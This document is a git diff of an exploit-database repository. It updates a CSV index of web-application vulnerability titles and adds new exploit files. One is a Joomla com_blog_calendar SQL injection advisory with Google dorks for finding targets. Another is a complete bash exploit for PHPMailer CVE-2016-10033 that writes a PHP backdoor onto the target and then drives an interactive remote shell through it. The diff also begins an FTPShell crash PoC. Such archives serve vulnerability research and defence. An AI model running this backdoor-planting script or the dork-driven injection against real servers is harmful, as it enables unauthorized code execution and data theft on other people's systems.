6710,platforms/php/webapps/6710.txt,"camera Life 2.6.2b4 - SQL Injection / Cross-Site Scripting",2008-10-09,BackDoor,php,webapps,0
|
||||
6710,platforms/php/webapps/6710.txt,"Camera Life 2.6.2b4 - SQL Injection / Cross-Site Scripting",2008-10-09,BackDoor,php,webapps,0
|
||||
6711,platforms/php/webapps/6711.htm,"Kusaba 1.0.4 - Remote Code Execution (2)",2008-10-09,Sausage,php,webapps,0
|
||||
6712,platforms/php/webapps/6712.txt,"IranMC Arad Center - 'news.php id' SQL Injection",2008-10-09,"Hussin X",php,webapps,0
|
||||
6712,platforms/php/webapps/6712.txt,"IranMC Arad Center - SQL Injection",2008-10-09,"Hussin X",php,webapps,0
|
||||
6713,platforms/php/webapps/6713.txt,"Scriptsez Mini Hosting Panel - 'members.php' Local File Inclusion",2008-10-09,JosS,php,webapps,0
|
||||
6714,platforms/php/webapps/6714.pl,"Stash 1.0.3 - (SQL Injection) User Credentials Disclosure",2008-10-09,gnix,php,webapps,0
|
||||
6715,platforms/php/webapps/6715.txt,"Scriptsez Easy Image Downloader - Local File Download",2008-10-09,JosS,php,webapps,0
|
||||
6720,platforms/asp/webapps/6720.txt,"Ayco Okul Portali - (linkid) SQL Injection (tr)",2008-10-10,Crackers_Child,asp,webapps,0
|
||||
6720,platforms/asp/webapps/6720.txt,"Ayco Okul Portali - 'linkid' Parameter SQL Injection",2008-10-10,Crackers_Child,asp,webapps,0
|
||||
6721,platforms/php/webapps/6721.txt,"Easynet4u Forum Host - 'forum.php' SQL Injection",2008-10-10,SuB-ZeRo,php,webapps,0
|
||||
6722,platforms/php/webapps/6722.txt,"Easynet4u faq Host - 'faq.php faq' SQL Injection",2008-10-10,SuB-ZeRo,php,webapps,0
|
||||
6722,platforms/php/webapps/6722.txt,"Easynet4u faq Host - 'faq.php' SQL Injection",2008-10-10,SuB-ZeRo,php,webapps,0
|
||||
6723,platforms/php/webapps/6723.txt,"Joomla! Component Ignite Gallery 0.8.3 - SQL Injection",2008-10-10,H!tm@N,php,webapps,0
|
||||
6724,platforms/php/webapps/6724.txt,"Joomla! Component mad4Joomla! - SQL Injection",2008-10-10,H!tm@N,php,webapps,0
|
||||
6725,platforms/asp/webapps/6725.txt,"MunzurSoft Wep Portal W3 - (kat) SQL Injection",2008-10-10,LUPUS,asp,webapps,0
|
||||
6728,platforms/php/webapps/6728.txt,"Easynet4u Link Host - 'cat_id' SQL Injection",2008-10-10,BeyazKurt,php,webapps,0
|
||||
6729,platforms/php/webapps/6729.php,"SlimCMS 1.0.0 - (redirect.php) Privilege Escalation",2008-10-10,StAkeR,php,webapps,0
|
||||
6730,platforms/php/webapps/6730.txt,"Joomla! Component ownbiblio 1.5.3 - 'catid' SQL Injection",2008-10-11,H!tm@N,php,webapps,0
|
||||
6725,platforms/asp/webapps/6725.txt,"MunzurSoft Wep Portal W3 - 'kat' Parameter SQL Injection",2008-10-10,LUPUS,asp,webapps,0
|
||||
6728,platforms/php/webapps/6728.txt,"Easynet4u Link Host - 'cat_id' Parameter SQL Injection",2008-10-10,BeyazKurt,php,webapps,0
|
||||
6729,platforms/php/webapps/6729.php,"SlimCMS 1.0.0 - 'redirect.php' Privilege Escalation",2008-10-10,StAkeR,php,webapps,0
|
||||
6730,platforms/php/webapps/6730.txt,"Joomla! Component ownbiblio 1.5.3 - 'catid' Parameter SQL Injection",2008-10-11,H!tm@N,php,webapps,0
|
||||
6731,platforms/asp/webapps/6731.txt,"Absolute Poll Manager XE 4.1 - 'xlacomments.asp' SQL Injection",2008-10-11,Hakxer,asp,webapps,0
|
||||
6733,platforms/php/webapps/6733.txt,"mini-pub 0.3 - File Disclosure / Code Execution",2008-10-12,muuratsalo,php,webapps,0
|
||||
6734,platforms/php/webapps/6734.txt,"mini-pub 0.3 - Local Directory Traversal / File Disclosure",2008-10-12,GoLd_M,php,webapps,0
|
||||
6735,platforms/php/webapps/6735.php,"Globsy 1.0 - Remote File Rewriting Exploit",2008-10-12,StAkeR,php,webapps,0
|
||||
6736,platforms/php/webapps/6736.txt,"Real Estate Scripts 2008 - 'index.php cat' SQL Injection",2008-10-12,Hakxer,php,webapps,0
|
||||
6736,platforms/php/webapps/6736.txt,"Real Estate Scripts 2008 - 'cat' Parameter SQL Injection",2008-10-12,Hakxer,php,webapps,0
|
||||
6737,platforms/php/webapps/6737.txt,"LokiCMS 0.3.4 - 'index.php' Arbitrary Check File Exploit",2008-10-12,JosS,php,webapps,0
|
||||
6739,platforms/php/webapps/6739.txt,"NewLife Blogger 3.0 - Insecure Cookie Handling / SQL Injection",2008-10-12,Pepelux,php,webapps,0
|
||||
6740,platforms/php/webapps/6740.txt,"My PHP Indexer 1.0 - 'index.php' Local File Download",2008-10-12,JosS,php,webapps,0
|
||||
6743,platforms/php/webapps/6743.pl,"LokiCMS 0.3.4 - 'writeconfig()' Remote Command Execution",2008-10-13,girex,php,webapps,0
|
||||
6744,platforms/php/webapps/6744.txt,"LokiCMS 0.3.4 - 'admin.php' Create Local File Inclusion",2008-10-13,JosS,php,webapps,0
|
||||
6745,platforms/php/webapps/6745.txt,"ParsBlogger - 'links.asp id' SQL Injection",2008-10-13,"Hussin X",php,webapps,0
|
||||
6746,platforms/php/webapps/6746.txt,"IndexScript 3.0 - (sug_cat.php parent_id) SQL Injection",2008-10-13,d3v1l,php,webapps,0
|
||||
6745,platforms/php/webapps/6745.txt,"ParsBlogger - 'links.asp' SQL Injection",2008-10-13,"Hussin X",php,webapps,0
|
||||
6746,platforms/php/webapps/6746.txt,"IndexScript 3.0 - 'parent_id' Parameter SQL Injection",2008-10-13,d3v1l,php,webapps,0
|
||||
6747,platforms/php/webapps/6747.php,"WordPress Plugin WP Comment Remix 1.4.3 - SQL Injection",2008-10-14,g30rg3_x,php,webapps,0
|
||||
6748,platforms/php/webapps/6748.txt,"XOOPS Module xhresim - 'index.php no' SQL Injection",2008-10-14,EcHoLL,php,webapps,0
|
||||
6748,platforms/php/webapps/6748.txt,"XOOPS Module xhresim - SQL Injection",2008-10-14,EcHoLL,php,webapps,0
|
||||
6749,platforms/php/webapps/6749.php,"Nuked-klaN 1.7.7 / SP4.4 - Multiple Vulnerabilities",2008-10-14,"Charles Fol",php,webapps,0
|
||||
6751,platforms/php/webapps/6751.txt,"SezHoo 0.1 - (IP) Remote File Inclusion",2008-10-14,DaRkLiFe,php,webapps,0
|
||||
6751,platforms/php/webapps/6751.txt,"SezHoo 0.1 - Remote File Inclusion",2008-10-14,DaRkLiFe,php,webapps,0
|
||||
6754,platforms/php/webapps/6754.txt,"My PHP Dating - 'success_story.php id' SQL Injection",2008-10-14,Hakxer,php,webapps,0
|
||||
6755,platforms/php/webapps/6755.php,"PHPWebGallery 1.7.2 - Session Hijacking / Code Execution",2008-10-14,EgiX,php,webapps,0
|
||||
6758,platforms/php/webapps/6758.txt,"AstroSPACES - 'id' SQL Injection",2008-10-15,TurkishWarriorr,php,webapps,0
|
||||
|
@ -21181,7 +21183,7 @@ id,file,description,date,author,platform,type,port
|
|||
8953,platforms/php/webapps/8953.txt,"elvin bts 1.2.0 - Multiple Vulnerabilities",2009-06-15,SirGod,php,webapps,0
|
||||
8954,platforms/php/webapps/8954.txt,"adaptweb 0.9.2 - Local File Inclusion / SQL Injection",2009-06-15,SirGod,php,webapps,0
|
||||
8956,platforms/php/webapps/8956.htm,"Evernew Free Joke Script 1.2 - Remote Change Password Exploit",2009-06-15,Hakxer,php,webapps,0
|
||||
8958,platforms/php/webapps/8958.txt,"torrenttrader classic 1.09 - Multiple Vulnerabilities",2009-06-15,waraxe,php,webapps,0
|
||||
8958,platforms/php/webapps/8958.txt,"TorrentTrader Classic 1.09 - Multiple Vulnerabilities",2009-06-15,waraxe,php,webapps,0
|
||||
8959,platforms/php/webapps/8959.pl,"Joomla! Component com_iJoomla_rss - Blind SQL Injection",2009-06-15,"Mehmet Ince",php,webapps,0
|
||||
8961,platforms/php/webapps/8961.txt,"WordPress Plugin Photoracer 1.0 - 'id' SQL Injection",2009-06-15,Kacper,php,webapps,0
|
||||
8962,platforms/php/webapps/8962.txt,"PHPCollegeExchange 0.1.5c - (listing_view.php itemnr) SQL Injection",2009-06-15,SirGod,php,webapps,0
|
||||
|
@ -22709,7 +22711,7 @@ id,file,description,date,author,platform,type,port
|
|||
11896,platforms/php/webapps/11896.txt,"BPTutors Tutoring site script - Cross-Site Request Forgery (Add Admin)",2010-03-26,bi0,php,webapps,0
|
||||
11897,platforms/php/webapps/11897.php,"Kasseler CMS 1.4.x lite Module Jokes - SQL Injection",2010-03-26,Sc0rpi0n,php,webapps,0
|
||||
11898,platforms/php/webapps/11898.py,"Date & Sex Vor und Rückwärts Auktions System 2 - Blind SQL Injection",2010-03-27,"Easy Laster",php,webapps,0
|
||||
11899,platforms/php/webapps/11899.html,"AdaptCMS Lite 1.5 2009-07-07 - Exploit",2010-03-27,ITSecTeam,php,webapps,0
|
||||
11899,platforms/php/webapps/11899.html,"AdaptCMS Lite 1.5 - Arbitrary Add Admin",2010-03-27,ITSecTeam,php,webapps,0
|
||||
11902,platforms/php/webapps/11902.txt,"MyOWNspace 8.2 - Multiple Local File Inclusions",2010-03-27,ITSecTeam,php,webapps,0
|
||||
11903,platforms/php/webapps/11903.txt,"Open Web Analytics 1.2.3 - Multiple File Inclusions",2010-03-27,ITSecTeam,php,webapps,0
|
||||
11904,platforms/php/webapps/11904.txt,"68KB - Multiple Remote File Inclusions",2010-03-27,ITSecTeam,php,webapps,0
|
||||
|
@ -31125,7 +31127,7 @@ id,file,description,date,author,platform,type,port
|
|||
30534,platforms/php/webapps/30534.txt,"PHPGedView 4.1 - 'login.php' Cross-Site Scripting",2007-08-27,"Joshua Morin",php,webapps,0
|
||||
30539,platforms/php/webapps/30539.txt,"ACG News 1.0 - 'index.php' Multiple SQL Injection",2007-08-28,SmOk3,php,webapps,0
|
||||
30541,platforms/asp/webapps/30541.txt,"Cisco CallManager 4.2 - / CUCM 4.2 Logon Page lang Parameter SQL Injection",2007-08-29,anonymous,asp,webapps,0
|
||||
30545,platforms/asp/webapps/30545.txt,"Absolute Poll Manager XE 4.1 - xlaapmview.asp Cross-Site Scripting",2007-08-30,"Richard Brain",asp,webapps,0
|
||||
30545,platforms/asp/webapps/30545.txt,"Absolute Poll Manager XE 4.1 - 'xlaapmview.asp' Cross-Site Scripting",2007-08-30,"Richard Brain",asp,webapps,0
|
||||
30547,platforms/hardware/webapps/30547.txt,"D-Link DSL-2750u ME_1.09 - Cross-Site Request Forgery",2013-12-28,"FIGHTERx war",hardware,webapps,0
|
||||
30969,platforms/php/webapps/30969.txt,"MODx 0.9.6.1 - 'AjaxSearch.php' Local File Inclusion",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0
|
||||
31030,platforms/php/webapps/31030.pl,"WordPress Plugin SpamBam - Key Calculation Security Bypass",2007-01-15,Romero,php,webapps,0
|
||||
|
@ -31218,7 +31220,7 @@ id,file,description,date,author,platform,type,port
|
|||
30633,platforms/php/webapps/30633.txt,"Uebimiau Webmail 2.7.x - 'index.php' Cross-Site Scripting",2007-10-03,"Ivan Sanches",php,webapps,0
|
||||
30634,platforms/php/webapps/30634.txt,"Content Builder 0.7.5 - postComment.php Remote File Inclusion",2007-10-03,"Mehrad Ansari Targhi",php,webapps,0
|
||||
30637,platforms/php/webapps/30637.js,"WordPress Plugin Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery",2007-10-04,"David Kierznowski",php,webapps,0
|
||||
30638,platforms/php/webapps/30638.txt,"GForge 3.1/4.5/4.6 - Verify.php Cross-Site Scripting",2007-10-04,"Jose Sanchez",php,webapps,0
|
||||
30638,platforms/php/webapps/30638.txt,"GForge 3.1/4.5/4.6 - 'Verify.php' Cross-Site Scripting",2007-10-04,"Jose Sanchez",php,webapps,0
|
||||
30968,platforms/php/webapps/30968.txt,"MODx 0.9.6.1 - 'htcmime.php' Source Code Information Disclosure",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0
|
||||
30639,platforms/cgi/webapps/30639.txt,"Cart32 6.x - GetImage Arbitrary File Download",2007-10-04,"Paul Craig",cgi,webapps,0
|
||||
30640,platforms/php/webapps/30640.txt,"Stuffed Guys Stuffed Tracker - Multiple Cross-Site Scripting Vulnerabilities",2007-10-04,"Aria-Security Team",php,webapps,0
|
||||
|
@ -32343,9 +32345,9 @@ id,file,description,date,author,platform,type,port
|
|||
32419,platforms/php/webapps/32419.pl,"Libra File Manager 1.18/2.0 - 'fileadmin.php' Local File Inclusion",2008-09-25,Pepelux,php,webapps,0
|
||||
32421,platforms/php/webapps/32421.html,"Flatpress 0.804 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-25,"Fabian Fingerle",php,webapps,0
|
||||
32422,platforms/php/webapps/32422.txt,"Vikingboard 0.2 Beta - 'register.php' SQL Column Truncation Unauthorized Access",2008-09-25,StAkeR,php,webapps,0
|
||||
32423,platforms/jsp/webapps/32423.txt,"OpenNMS 1.5.x - j_acegi_security_check j_username Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0
|
||||
32424,platforms/jsp/webapps/32424.txt,"OpenNMS 1.5.x - notification/list.jsp 'Username' Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0
|
||||
32425,platforms/jsp/webapps/32425.txt,"OpenNMS 1.5.x - event/list filter Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0
|
||||
32423,platforms/jsp/webapps/32423.txt,"OpenNMS 1.5.x - 'j_username' Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0
|
||||
32424,platforms/jsp/webapps/32424.txt,"OpenNMS 1.5.x - 'Username' Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0
|
||||
32425,platforms/jsp/webapps/32425.txt,"OpenNMS 1.5.x - 'filter' Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0
|
||||
32427,platforms/php/webapps/32427.txt,"Barcode Generator 2.0 - 'LSTable.php' Remote File Inclusion",2008-09-26,"Br0k3n H34rT",php,webapps,0
|
||||
32430,platforms/cgi/webapps/32430.txt,"WhoDomLite 1.1.3 - 'wholite.cgi' Cross-Site Scripting",2008-09-27,"Ghost Hacker",cgi,webapps,0
|
||||
32431,platforms/php/webapps/32431.txt,"Lyrics Script - 'search_results.php' Cross-Site Scripting",2008-09-27,"Ghost Hacker",php,webapps,0
|
||||
|
@ -34871,8 +34873,8 @@ id,file,description,date,author,platform,type,port
|
|||
36661,platforms/php/webapps/36661.txt,"PHP-Fusion 7.2.4 - 'weblink_id' Parameter SQL Injection",2012-02-03,Am!r,php,webapps,0
|
||||
36664,platforms/php/webapps/36664.txt,"Vespa 0.8.6 - 'getid3.php' Local File Inclusion",2012-02-06,T0x!c,php,webapps,0
|
||||
36665,platforms/php/webapps/36665.txt,"Simple Groupware 0.742 - 'export' Parameter Cross-Site Scripting",2012-02-07,"Infoserve Security Team",php,webapps,0
|
||||
36666,platforms/java/webapps/36666.txt,"ManageEngine ADManager Plus 5.2 Build 5210 - DomainConfig.do Operation Parameter Cross-Site Scripting",2012-02-07,LiquidWorm,java,webapps,0
|
||||
36667,platforms/java/webapps/36667.txt,"ManageEngine ADManager Plus 5.2 Build 5210 - jsp/AddDC.jsp domainName Parameter Cross-Site Scripting",2012-02-07,LiquidWorm,java,webapps,0
|
||||
36666,platforms/java/webapps/36666.txt,"ManageEngine ADManager Plus 5.2 Build 5210 - 'Operation' Parameter Cross-Site Scripting",2012-02-07,LiquidWorm,java,webapps,0
|
||||
36667,platforms/java/webapps/36667.txt,"ManageEngine ADManager Plus 5.2 Build 5210 - 'domainName' Parameter Cross-Site Scripting",2012-02-07,LiquidWorm,java,webapps,0
|
||||
36668,platforms/php/webapps/36668.txt,"eFront 3.6.10 - 'administrator.php' Cross-Site Scripting",2012-02-07,"Chokri B.A",php,webapps,0
|
||||
36671,platforms/php/webapps/36671.txt,"WordPress Plugin All In One WP Security & Firewall 3.9.0 - SQL Injection",2015-04-08,"Claudio Viviani",php,webapps,80
|
||||
36674,platforms/php/webapps/36674.txt,"WordPress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting",2015-04-08,"Kacper Szurek",php,webapps,80
|
||||
|
@ -36918,3 +36920,5 @@ id,file,description,date,author,platform,type,port
|
|||
40941,platforms/php/webapps/40941.txt,"WordPress Plugin 404 Redirection Manager 1.0 - SQL Injection",2016-12-19,"Ahmed Sherif",php,webapps,0
|
||||
40942,platforms/multiple/webapps/40942.py,"ntop-ng 2.5.160805 - Username Enumeration",2016-08-04,"Dolev Farhi",multiple,webapps,0
|
||||
40961,platforms/multiple/webapps/40961.py,"Apache mod_session_crypto - Padding Oracle",2016-12-23,"RedTeam Pentesting GmbH",multiple,webapps,0
|
||||
40966,platforms/php/webapps/40966.txt,"Joomla! Component Blog Calendar - SQL Injection",2016-12-26,X-Cisadane,php,webapps,0
|
||||
40968,platforms/php/webapps/40968.sh,"PHPMailer 5.2.17 - Remote Code Execution",2016-12-26,"Dawid Golunski",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
32
platforms/php/webapps/40966.txt
Executable file
32
platforms/php/webapps/40966.txt
Executable file
|
@ -0,0 +1,32 @@
|
|||
==========================================================================================
|
||||
Joomla com_blog_calendar SQL Injection Vulnerability
|
||||
==========================================================================================
|
||||
|
||||
:-------------------------------------------------------------------------------------------------------------------------:
|
||||
: # Exploit Title : Joomla com_blog_calendar SQL Injection Vulnerability
|
||||
: # Date : 26th December 2016
|
||||
: # Author : X-Cisadane
|
||||
: # CMS Name : Joomla
|
||||
: # CMS Developer : http://joomlacode.org/gf/project/blog_calendar/
|
||||
: # Category : Web Application
|
||||
: # Vulnerability : SQL Injection
|
||||
: # Tested On : SQLMap 1.0.12.9#dev
|
||||
: # Greetz to : X-Code YogyaFree, ExploreCrew, CodeNesia, Bogor Hackers Community, Borneo Crew, Depok Cyber, Mantan
|
||||
:-------------------------------------------------------------------------------------------------------------------------:
|
||||
|
||||
A SQL Injection Vulnerability has been discovered in the Joomla Module called com_blog_calendar.
|
||||
The Vulnerability is located in the index.php?option=com_blog_calendar&modid=xxx Parameter.
|
||||
Attackers are able to execute own SQL commands by usage of a GET Method Request with manipulated modid Value.
|
||||
Attackers are able to read Database information by execution of own SQL commands.
|
||||
|
||||
DORKS (How to find the target) :
|
||||
================================
|
||||
inurl:/index.php?option=com_blog_calendar
|
||||
Or use your own Google Dorks :)
|
||||
|
||||
Proof of Concept
|
||||
================
|
||||
|
||||
SQL Injection
|
||||
PoC :
|
||||
http://[Site]/[Path]/index.php?option=com_blog_calendar&modid=['SQLi]
|
27
platforms/php/webapps/40968.sh
Executable file
27
platforms/php/webapps/40968.sh
Executable file
|
@ -0,0 +1,27 @@
|
|||
#!/bin/bash
|
||||
# CVE-2016-10033 exploit by opsxcq
|
||||
# https://github.com/opsxcq/exploit-CVE-2016-10033
|
||||
|
||||
echo '[+] CVE-2016-10033 exploit by opsxcq'
|
||||
|
||||
if [ -z "$1" ]
|
||||
then
|
||||
echo '[-] Please inform an host as parameter'
|
||||
exit -1
|
||||
fi
|
||||
|
||||
host=$1
|
||||
|
||||
echo '[+] Exploiting '$host
|
||||
|
||||
curl -sq 'http://'$host -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzXJpHSq4mNy35tHe' --data-binary $'------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="action"\r\n\r\nsubmit\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="name"\r\n\r\n<?php echo "|".base64_encode(system(base64_decode($_GET["cmd"])))."|"; ?>\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="email"\r\n\r\nvulnerables@ -OQueueDirectory=/tmp -X/www/backdoor.php\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="message"\r\n\r\nPwned\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe--\r\n' >/dev/null && echo '[+] Target exploited, acessing shell at http://'$host'/backdoor.php'
|
||||
|
||||
cmd='whoami'
|
||||
while [ "$cmd" != 'exit' ]
|
||||
do
|
||||
echo '[+] Running '$cmd
|
||||
curl -sq http://$host/backdoor.php?cmd=$(echo -ne $cmd | base64) | grep '|' | head -n 1 | cut -d '|' -f 2 | base64 -d
|
||||
echo
|
||||
read -p 'RemoteShell> ' cmd
|
||||
done
|
||||
echo '[+] Exiting'
|
|
@ -1,4 +1,3 @@
|
|||
|
||||
Gforge <= 4.5.19 Multiple Sql Injections
|
||||
|
||||
Vendor Notified: 2008-10-06
|
||||
|
|
96
platforms/windows/dos/40965.py
Executable file
96
platforms/windows/dos/40965.py
Executable file
|
@ -0,0 +1,96 @@
|
|||
#Exploit FTPShell server 6.36 '.csv' Crash(PoC)
|
||||
#Author: albalawi_sultan
|
||||
#Tested on:win7
|
||||
#st :http://www.ftpshell.com/download.htm
|
||||
#1-open FTPShell Server Administrator
|
||||
#2-manage Ftp accounts
|
||||
#3-import from csv
|
||||
ban= '\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x5c\x20\x20\x20\x2d\x20\x20'
|
||||
ban+='\x2d\x20\x20\x2d\x20\x3c\x73\x65\x72\x76\x65\x72\x3e\x20\x20\x2d'
|
||||
ban+='\x20\x5c\x2d\x2d\x2d\x3c\x20\x2d\x20\x2d\x20\x20\x2d\x20\x2d\x20'
|
||||
ban+='\x20\x2d\x20\x20\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x0d\x0a\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x7c\x20\x20\x20\x20\x44\x6f\x63\x5f\x41\x74\x74'
|
||||
ban+='\x61\x63\x6b\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a'
|
||||
ban+='\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x76\x20\x20\x20\x20\x20\x20\x20\x20\x60\x20\x60\x2e'
|
||||
ban+='\x20\x20\x20\x20\x2c\x3b\x27\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x41\x70\x50'
|
||||
ban+='\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x20\x2c\x27\x2f\x20\x2e\x27'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d'
|
||||
ban+='\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x60\x2e\x20\x58\x20\x2f\x2e\x27\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x2a\x20\x20\x20\x20\x20\x2a\x2a\x2a'
|
||||
ban+='\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x2e\x2d\x3b\x2d\x2d\x27\x27\x2d\x2d\x2e\x5f\x60\x20'
|
||||
ban+='\x60\x20\x28\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x0d'
|
||||
ban+='\x0a\x20\x20\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x2f\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x7c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x0d\x0a\x20'
|
||||
ban+='\x20\x20\x20\x20\x3b\x53\x65\x63\x75\x72\x69\x74\x79\x60\x20\x20'
|
||||
ban+='\x27\x20\x30\x20\x20\x30\x20\x27\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x2a\x2a\x2a\x4e\x45\x54\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x7c\x0d\x0a\x20\x20\x20\x20\x2c\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x2c\x20\x20\x20\x20\x27\x20\x20\x7c\x20\x20\x27\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x5e\x0d\x0a\x20\x2c\x2e\x20\x7c\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x60\x2e\x5f\x2e\x27'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
|
||||
ban+='\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5e\x2d\x2d\x2d\x5e\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20\x3a\x20\x20\x2e\x20\x60'
|
||||
ban+='\x20\x20\x3b\x20\x20\x20\x60\x20\x20\x60\x20\x2d\x2d\x2c\x2e\x2e'
|
||||
ban+='\x5f\x3b\x2d\x2d\x2d\x3e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x27\x2e\x27\x2e\x27\x5f\x5f\x5f\x5f'
|
||||
ban+='\x5f\x5f\x5f\x5f\x20\x2a\x0d\x0a\x20\x20\x27\x20\x60\x20\x20\x20'
|
||||
ban+='\x20\x2c\x20\x20\x20\x29\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x7c\x5f\x7c\x20\x46\x69\x72\x65\x77'
|
||||
ban+='\x61\x6c\x6c\x20\x29\x0d\x0a\x20\x20\x20\x20\x20\x60\x2e\x5f\x20'
|
||||
ban+='\x2c\x20\x20\x27\x20\x20\x20\x2f\x5f\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20'
|
||||
ban+='\x7c\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3b\x20\x2c\x27'
|
||||
ban+='\x27\x2d\x2c\x3b\x27\x20\x60\x60\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f'
|
||||
ban+='\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x7c\x0d\x0a\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x60\x60\x2d\x2e\x2e\x5f\x5f\x60\x60\x2d'
|
||||
ban+='\x2d\x60\x20\x20\x20\x20\x20\x20\x20\x69\x70\x73\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x27'
|
||||
ban+='\x2e\x20\x5f\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2a\x0d\x0a\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x20'
|
||||
ban+='\x7c\x5f\x20\x20\x49\x50\x53\x20\x20\x20\x20\x20\x29\x0d\x0a\x20'
|
